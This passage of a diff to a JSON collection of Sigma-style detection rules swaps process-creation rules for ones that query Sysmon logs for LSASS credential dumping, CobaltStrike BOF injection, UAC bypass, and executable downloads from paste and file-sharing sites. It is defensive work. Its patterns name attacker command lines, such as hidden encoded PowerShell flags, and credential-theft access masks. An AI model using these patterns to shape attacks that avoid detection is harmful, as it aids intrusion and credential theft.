"attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE 
'%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR 
(CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Trickbot 
Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Rare System Admin Activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + 
"attack.t1564.004" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.lateral_movement" + "attack.t1003.001" ], 
"falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", - "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1106" ], "falsepositives": [ - "Other scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE 
'%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE 
'%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", - "status": "experimental", - "description": "Detects suspicious 
manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "status": "test", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% 
\"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "status": "test", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." 
+ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "status": "test", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE 
'%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage 